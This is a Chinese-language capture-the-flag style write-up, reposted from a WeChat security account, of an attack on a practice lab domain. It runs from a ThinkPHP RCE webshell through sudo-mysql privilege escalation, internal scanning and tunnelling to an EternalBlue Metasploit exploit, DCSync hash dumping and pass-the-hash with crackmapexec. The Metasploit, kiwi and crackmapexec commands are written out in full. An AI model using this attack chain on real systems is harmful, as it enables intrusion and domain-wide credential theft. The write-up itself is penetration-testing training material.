前言:本文中涉及到的技术,只提供思路,严禁用于违法测试
当然哦,还是用靶机吧,希望大家都保护好自己,哈哈哈0x01 开启环境
0x02 web渗透
开启环境,访问web页面。
发现登录功能是个鸡肋,翻看别的功能点。
查看到这个熟悉的log,猜测可能存在框架漏洞。
使用漏洞利用工具进行探测。
发现存在thinkphp5.0.23漏洞,成功拿下webshell。
0x03 内网渗透
尝试suid提取,无结果。
find / -perm -u=s -type f 2>/dev/null尝试sudo提取。
发现这个mysql是一个利用点。
https://gtfobins.github.io/查看提权命令
sudo mysql -e '! find / -name flag*'
sudo mysql -e '! cat /root/flag/flag01.txt'
拿下flag1。
继续信息收集。
ip a
发现有一个内网网段,上传fscan,进行内网扫描。
./fscan -h 172.22.1.0/24 1.txt打开查看结果
172.22.1.18:135 open172.22.1.21:135 open172.22.1.2:135 open172.22.1.18:80 open172.22.1.15:80 open172.22.1.15:22 open172.22.1.18:3306 open172.22.1.2:88 open172.22.1.21:139 open172.22.1.2:139 open172.22.1.18:445 open172.22.1.21:445 open172.22.1.2:445 open172.22.1.18:139 open[+] MS17-010 172.22.1.21 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)[*] WebTitle http://172.22.1.15 code:200 len:5578 title:Bootstrap Material Admin[*] OsInfo 172.22.1.2 (Windows Server 2016 Datacenter 14393)[*] NetBios 172.22.1.21 XIAORANG-WIN7.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1[*] NetBios 172.22.1.2 [+] DC:DC01.xiaorang.lab Windows Server 2016 Datacenter 14393[*] NetBios 172.22.1.18 XIAORANG-OA01.xiaorang.lab Windows Server 2012 R2 Datacenter 9600[*] WebTitle http://172.22.1.18 code:302 len:0 title:None 跳转url: http://172.22.1.18?m=login[*] WebTitle http://172.22.1.18?m=login code:200 len:4012 title:信呼协同办公系统[+] PocScan http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1已完成 14/14[*] 扫描结束,耗时: 11.656481329s
探测出内网其他的资产。现在我们总结一下
172.22.1.2-》DC域控172.22.1.21-》Windows的机器并且存在MS17-010 漏洞172.22.1.18-》信呼OA办公系统
现在进行内网穿透。
第一种用 NPS进行代理转发。
https://blog.csdn.net/qq_44159028/article/details/122719330第二种chisel同ew相似但是更稳定
https://blog.csdn.net/weixin_43093631/article/details/118273506也可以用frp等等,都可以用 只要版本对应上就行。
目标内网信呼OA。
弱口令 admin/admin123就成功登录了进去。
查找信呼OA漏洞,发现有一个RCE漏洞,这是第一种打法。
https://blog.csdn.net/solitudi/article/details/118675321第二种做法是在扫目录基础上,利用/phpmyadmin,可以直接 root/root 登录,然后利用日志写入 webshell
这里就不再演示了。
https://blog.csdn.net/m0_48108919/article/details/123053622通过RCE漏洞拿到webshell。(蚁剑连接的时候记得配置上代理)
拿下flag2。
接下来打永恒之蓝的漏洞。
使用msf,配置kali自带的proxychains。
https://www.cnblogs.com/junlin623/p/17442091.htmlproxychains msfconsole走 socks5 流量,
proxychains msfconsoleuse exploit/windows/smb/ms17_010_eternalblueset payload windows/x64/meterpreter/bind_tcp_uuidset RHOSTS 172.22.1.21exploit
得到正向的 meterpreter shell 后,接下来就是利用 DCSync
https://www.cnblogs.com/CoLo/p/16488892.html最大的特点就是可以实现不登录到域控而获取域控上的数据。
在 MSF 下直接load kiwi,然后
kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit 导出域内所有用户的 Hash。
之前扫出来172.22.1.2的 445 端口开放,利用 smb 哈希传递,直接用 kali 自带的 crackmapexec,
proxychains crackmapexec smb 172.22.1.2 -u administrator -H 10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "$cmd"最后一部分 flag 在/Users/Administrators/flag下
拿到flag3。
0x04 总结
web打点--》提权--》内网穿透--》内网渗透--》拿下域控。
该靶场对于新学内网的师傅还是挺友好的,除了最后拿下域控那一步,其余的都应该是常见的渗透手法。
以上为我的一些做题笔记,大佬勿喷。
感谢各位大佬们关注LHACK安全,正在努力的进步中,后续会坚持更新渗透漏洞思路分享、好用工具分享以及挖掘SRC思路等文章,希望能得到各位师傅们的关注与支持。想要加交流群的师傅,主页加我,备注加群。
原文始发于微信公众号(LHACK安全):一次完整的实战域渗透
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论